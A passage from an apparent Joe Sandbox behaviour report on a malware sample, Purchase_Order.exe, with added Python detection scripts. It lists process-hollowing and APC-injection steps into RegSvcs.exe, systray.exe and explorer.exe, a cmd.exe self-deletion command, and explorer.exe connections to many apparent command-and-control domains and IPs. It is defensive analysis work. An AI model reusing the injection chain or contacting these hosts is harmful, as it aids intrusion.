            Source: C:\Users\user\Desktop\Purchase_Order.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Purchase_Order.exe Memory allocated: page read and write | page guard
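The hundreds of "mov eax, dword ptr fs:[00000030h]" hits above are all the same primitive: in a 32-bit process (both RegSvcs.exe under Framework\v4.0.30319 and systray.exe under SysWOW64 are 32-bit images) fs:[0] is the TEB and fs:[30h] holds the pointer to the PEB. The instruction that follows the read, which the report does not show, picks the field: BeingDebugged at PEB+0x02, Ldr at +0x0C, NtGlobalFlag at +0x68. A flat list of 200+ identical rows is hard to act on, so the script below (an added triage helper, not code from the report or from Joe Security) parses lines in the report's own "Source: <process> Code function: <id> <instruction>" shape, tolerating the run-together "exeCode function" form that text exports produce, counts PEB reads per function and ranks them. The interpretation strings are a heuristic of mine, labelled as such in the code; the sample lines are copied from the report's shape and include one constructed non-PEB instruction to show filtering.

```python
"""Triage of 'reads the PEB' hits from a Joe Sandbox text report (added example)."""
import re
from collections import Counter

# "Source: <path>.exe[ ]Code function: <id> <instruction>"; the space after
# ".exe" is optional because text exports run the two fields together.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Code function:\s*(?P<func>\S+)\s+(?P<insn>.+?)\s*$"
)
# Any "mov <32-bit reg>, dword ptr fs:[30h]" spelling, with or without leading zeros.
PEB_RE = re.compile(
    r"^mov\s+(?P<reg>e[abcd]x|e[sd]i|e[bs]p),\s*dword ptr fs:\[0*30h\]$", re.I
)

# Constructed sample in the report's shape (one line deliberately fused, one
# deliberately not a PEB read).
SAMPLE_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0133AE44 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F7849B mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04F916E0 mov ecx, dword ptr fs:[00000030h]",
] + [
    r"Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr fs:[00000030h]"
] * 5 + [
    r"Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_05021C06 mov eax, dword ptr [ebp-04h]",
]


def peb_reads(lines):
    """Count fs:[30h] reads per (process basename, function id)."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m or not PEB_RE.match(m.group("insn")):
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1]
        counts[(proc, m.group("func"))] += 1
    return counts


def interpret(n):
    """Heuristic (my assumption, not a report verdict): a lone read usually feeds
    one flag check such as BeingDebugged or NtGlobalFlag; many reads inside one
    function are more typical of code walking PEB structures, e.g. the Ldr
    module lists used for API resolution."""
    if n == 1:
        return "single PEB dereference: flag-check candidate"
    if n < 5:
        return "a few PEB reads: inspect for debugger/heap flag checks"
    return "repeated PEB reads: structure-walking candidate"


def rank_functions(lines, top=5):
    """Most PEB-heavy functions first, as (process, function id, count, note)."""
    return [(p, f, n, interpret(n)) for (p, f), n in peb_reads(lines).most_common(top)]


if __name__ == "__main__":
    for proc, func, n, note in rank_functions(SAMPLE_LINES):
        print(f"{proc:12} {func:14} {n:3}  {note}")
```

Run it over the full report text to get the short list of functions (16_2_05021C06, 16_2_05024496 and 16_2_04F73D34 carry the most reads here) to open first in a disassembler; the single-read functions are where a BeingDebugged or NtGlobalFlag comparison is most likely to sit.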

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Network Connect: 213.186.33.5 80
            Source: C:\Windows\explorer.exe Domain query: www.trainup-wall.com
            Source: C:\Windows\explorer.exe Network Connect: 172.67.155.26 80
            Source: C:\Windows\explorer.exe Domain query: www.flockuplabs.com
            Source: C:\Windows\explorer.exe Domain query: www.paolograssino.com
            Source: C:\Windows\explorer.exe Network Connect: 45.140.167.161 80
            Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exe Domain query: www.toolbnbapp.com
            Source: C:\Windows\explorer.exe Network Connect: 162.241.253.69 80
            Source: C:\Windows\explorer.exe Domain query: www.a-prime-india-demataccount.zone
            Source: C:\Windows\explorer.exe Network Connect: 151.101.0.119 80
            Source: C:\Windows\explorer.exe Network Connect: 104.21.64.212 80
            Source: C:\Windows\explorer.exe Domain query: www.gorditasdemaiz.com
            Source: C:\Windows\explorer.exe Network Connect: 156.241.53.127 80
            Source: C:\Windows\explorer.exe Domain query: www.cgjanvier.com
            Source: C:\Windows\explorer.exe Domain query: www.prltoday.com
            Source: C:\Windows\explorer.exe Network Connect: 160.16.235.37 80
            Source: C:\Windows\explorer.exe Domain query: www.culturalinterface.net
            Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe Domain query: www.mexicobeachselfstorage.com
            Source: C:\Windows\explorer.exe Domain query: www.tylerrucarean.com
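The detection handle in the block above is not any single domain but the shape of the traffic: explorer.exe, the desktop shell, resolving more than a dozen unrelated domains and opening plain HTTP connections to as many IPs within one run. Once the injected code lives in explorer.exe, a per-process firewall or proxy rule that trusts the shell lets it through, so the check has to be behavioural. The script below is an added example, not code from the report or from Joe Security: it maps the report's "Network Connect" / "Domain query" lines to (process, kind, value, port) tuples and alerts when a watched process touches at least a threshold of distinct domains or endpoints; the same function works on EDR or proxy logs once they are mapped to the same tuples. Sample lines are constructed in the report's shape; the iexplore.exe control line and the threshold of three are my assumptions.

```python
"""Flag a shell process that beacons to many hosts (added example)."""
import re
from collections import defaultdict

# Joe Sandbox text line; the space after ".exe" is optional because text
# exports sometimes run the path and the event name together.
EVENT_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*(?P<kind>Network Connect|Domain query):\s*"
    r"(?P<value>\S+)(?:\s+(?P<port>\d+))?"
)

# Constructed sample in the report's shape, plus one invented control line for
# a process that is expected to talk to the network.
SAMPLE_LINES = [
    r"Source: C:\Windows\explorer.exe Network Connect: 213.186.33.5 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.trainup-wall.com",
    r"Source: C:\Windows\explorer.exe Network Connect: 172.67.155.26 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.flockuplabs.com",
    r"Source: C:\Windows\explorer.exeDomain query: www.paolograssino.com",
    r"Source: C:\Windows\explorer.exe Network Connect: 45.140.167.161 80",
    r"Source: C:\Windows\explorer.exe Domain query: www.toolbnbapp.com",
    r"Source: C:\Program Files\Internet Explorer\iexplore.exe Domain query: www.example.com",
]


def parse_network_events(lines):
    """Yield (process basename, kind, value, port or None) per network line."""
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1].lower()
        port = int(m.group("port")) if m.group("port") else None
        yield proc, m.group("kind"), m.group("value").lower(), port


def find_beaconing_shell(lines, watched=("explorer.exe",), min_distinct=3):
    """Return {process: details} for watched processes that resolved at least
    min_distinct distinct domains or connected to that many distinct endpoints.
    'watched' lists processes that should not initiate outbound HTTP on their
    own; the default and the threshold are assumptions to tune per estate."""
    seen = defaultdict(lambda: {"domains": set(), "endpoints": set()})
    for proc, kind, value, port in parse_network_events(lines):
        if proc not in watched:
            continue
        if kind == "Domain query":
            seen[proc]["domains"].add(value)
        else:
            seen[proc]["endpoints"].add((value, port))
    alerts = {}
    for proc, s in seen.items():
        if len(s["domains"]) >= min_distinct or len(s["endpoints"]) >= min_distinct:
            alerts[proc] = {
                "domains": sorted(s["domains"]),
                "endpoints": sorted(s["endpoints"]),
                "reason": (f"{proc} touched {len(s['domains'])} domains and "
                           f"{len(s['endpoints'])} endpoints; a shell process "
                           f"normally initiates neither"),
            }
    return alerts


if __name__ == "__main__":
    for proc, detail in find_beaconing_shell(SAMPLE_LINES).items():
        print(detail["reason"])
        for d in detail["domains"]:
            print("  domain  ", d)
        for host, port in detail["endpoints"]:
            print("  endpoint", f"{host}:{port}")
```

In production, pair the watched list with an allowlist of the Microsoft endpoints explorer.exe legitimately contacts (an assumption you have to measure on your own baseline) so that a burst of distinct third-party domains over port 80 is what trips the rule, not routine shell traffic.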
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Purchase_Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3292
            Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3292
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 13B0000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Purchase_Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Purchase_Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Purchase_Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BEF008
            Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
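Read together, the signatures above describe one chain rather than six independent findings: Purchase_Order.exe starts RegSvcs.exe and writes a PE image (the 4D5A "MZ" bytes) at its image base 0x400000; RegSvcs.exe unmaps systray.exe's image at 0x13B0000 and maps RWX sections into both systray.exe and explorer.exe; execution is handed over with SetThreadContext (the report names that target only by PID 3292) and a queued APC into explorer.exe; and systray.exe finally spawns cmd.exe to delete the RegSvcs.exe copy. The script below is an added example, not code from the report or from Joe Security: it groups the "Memory written", "Section loaded/unmapped", "Thread register set" and "Thread APC queued" lines by (source, target) pair and names the technique each combination implies, with the closest MITRE ATT&CK sub-technique IDs as labels rather than verdicts. Sample lines are constructed in the report's shape; because this section does not map PID 3292 to a process name, that pair stays keyed by the PID.

```python
"""Reconstruct process-injection chains from Joe Sandbox behaviour lines (added example)."""
import re
from collections import defaultdict

# "Source: <path>.exe[ ]<event ...>"; the space after ".exe" is optional.
SOURCE_RE = re.compile(r"Source:\s*(?P<src>.+?\.exe)\s*(?P<rest>.+?)\s*$")

# event name -> regex over the text that follows the source path
EVENT_PATTERNS = {
    "process_created":  re.compile(r"^Process created:\s*(?P<target>\S+\.exe)"),
    "self_delete":      re.compile(r"^Process created:\s*\S+\\cmd\.exe\s+/c\s+del\s+'?(?P<file>[^']+\.exe)"),
    "mz_write":         re.compile(r"^Memory written:\s*(?P<target>\S+\.exe)\s+base:\s*[0-9A-Fa-f]+\s+value starts with:\s*4D5A"),
    "memory_write":     re.compile(r"^Memory written:\s*(?P<target>\S+\.exe)\s+base:\s*[0-9A-Fa-f]+$"),
    "rwx_section":      re.compile(r"^Section loaded: unknown target:\s*(?P<target>\S+\.exe)\s+protection: execute and read and write"),
    "section_unmapped": re.compile(r"^Section unmapped:\s*(?P<target>\S+\.exe)\s+base address:"),
    "thread_context":   re.compile(r"^Thread register set: target process:\s*(?P<target>\S+)"),
    "apc_queued":       re.compile(r"^Thread APC queued: target process:\s*(?P<target>\S+\.exe)"),
}

# Constructed sample in the report's shape.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
    r"Source: C:\Users\user\Desktop\Purchase_Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\Purchase_Order.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 13B0000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3292",
    r"Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3292",
    r"Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'",
]


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def reconstruct(lines):
    """Return ({(source, target): set of primitives}, [(source, deleted file)])."""
    chains = defaultdict(set)
    deletions = []
    for line in lines:
        m = SOURCE_RE.search(line)
        if not m:
            continue
        src, rest = _basename(m.group("src")), m.group("rest")
        for name, pat in EVENT_PATTERNS.items():
            e = pat.match(rest)
            if not e:
                continue
            if name == "self_delete":
                deletions.append((src, _basename(e.group("file"))))
            else:
                chains[(src, _basename(e.group("target")))].add(name)
    return dict(chains), deletions


def classify(steps):
    """Name the technique implied by the primitives seen for one pair."""
    if "section_unmapped" in steps and ("mz_write" in steps or "rwx_section" in steps):
        return "process hollowing: target image unmapped and replaced (T1055.012)"
    if "mz_write" in steps and "process_created" in steps:
        return "PE image written over a child process image base (T1055.012/T1055.002)"
    if "apc_queued" in steps:
        return "APC injection into a running process (T1055.004)"
    if "thread_context" in steps:
        return "thread context set in another process (T1055.003)"
    if "rwx_section" in steps:
        return "RWX section mapped into another process (T1055)"
    if steps == {"process_created"}:
        return "child process created, no injection primitive seen"
    return "memory written into another process (T1055)"


def report(lines):
    """Verdict per (source, target) pair plus self-deletion events (T1070.004)."""
    chains, deletions = reconstruct(lines)
    return {pair: classify(steps) for pair, steps in chains.items()}, deletions


if __name__ == "__main__":
    verdicts, deletions = report(SAMPLE_LINES)
    for (src, dst), verdict in verdicts.items():
        print(f"{src} -> {dst}: {verdict}")
    for src, path in deletions:
        print(f"{src} deletes {path} via cmd.exe (T1070.004)")
```

The same primitive sequence (NtCreateUserProcess of a suspended child, NtWriteVirtualMemory of an MZ header at the image base, NtUnmapViewOfSection, NtSetContextThread or NtQueueApcThread) is what an EDR sees through its syscall hooks, so the grouping logic transfers directly to endpoint telemetry; the PID-to-name resolution that the sandbox leaves to its process tree is the one piece you must add there.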
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
            Source: explorer.exe, 00000007.00000000.282403163.0000000005F40000.00000004.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmp Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.263828390.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
            Source: explorer.exe, 00000007.00000000.297184858.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000010.00000002.503774536.00000000037D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Users\user\Desktop\Purchase_Order.exe VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Purchase_Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
